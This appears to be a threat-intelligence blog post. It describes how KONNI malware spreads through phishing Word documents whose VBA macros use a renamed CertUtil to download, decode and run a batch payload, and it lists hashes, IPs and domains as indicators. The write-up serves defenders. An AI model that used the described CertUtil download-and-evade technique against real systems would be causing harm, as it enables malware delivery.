Phishing Emails Used to Deploy KONNI Malware

KONNI malware is often delivered via phishing emails as a Microsoft Word document with a malicious VBA macro code.

The malicious code can change the font color from light grey to black (to fool the user to enable content), check if the Windows operating system is a 32-bit or 64-bit version, and construct and execute the command line to download additional files.

Once the VBA macro constructs the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator. It also incorporates a built-in function to decode base64-encoded files. The Command Prompt silently copies certutil.exe into a temp directory and renames it to evade detection.

The cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.

Further information – https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b

IOCs

Lure Documents

  • 8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd
  • 4c201f9949804e90f94fe91882cb8aad3e7daf496a7f4e792b9c7fed95ab0726
  • ed63e84985e1af9c4764e6b6ca513ec1c16840fb2534b86f95e31801468be67a

Konni Loader

  • 6a22db7df237c085855deb48686217173dc2664f4b927ebe238d4442b68a2fd3
  • 2ab1b28bae24217e8b6dd0cd30bb7258fa34c0d7337ecfea55e4310d08aeb1e6

Konni final payload

  • e94fa697d8661d79260edf17c0a519fae4b2a64037aa79b29d6631205995fdad
  • 6256ba2b89c78877328cc70d45db980310a51545a83d1d922d64048b57d6c057
  • 52ba17b90244a46e0ef2a653452b26bcb94f0a03b999c343301fef4e3c1ec5d2
  • 7d2b1af486610a45f78a573af9a9ad00414680ff8e958cfb5437a1b140acb60c
  • ceb8093507911939a17c6c7b39475f5d4db70a9ed3b85ef34ff5e6372b20a73e
  • 8795b2756efa32d5101a8d38ea27fca9c8c7ed1d54da98f0520f72706d1c5105
  • 7f6984fa9d0bbc1bd6ab531f0a8c2f4beb15de30f2b20054d3980395d77665af
  • 290c942da70c68d28a387775fbb7e6cab6749547d278cb755b4999e0fe61a09f
  • 274e706809a1c0363f78363d0c6a7d256be5be11039de14f617265e01d550a98

IP Addresses

  • 69.197.143.12
  • 185.27.134.11
  • 88.99.13.69
  • 162.253.155.226

Domains

  • clean.1apps[.]com
  • handicap. eu5[.]org
  • panda2019.eu5[.]org
  • ftpupload[.]net

Duncan Newell

Duncan is a technology professional with over 20 years experience of working in various IT roles. He has a interest in cyber security, and has a wide range of other skills in radio, electronics and telecommunications.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: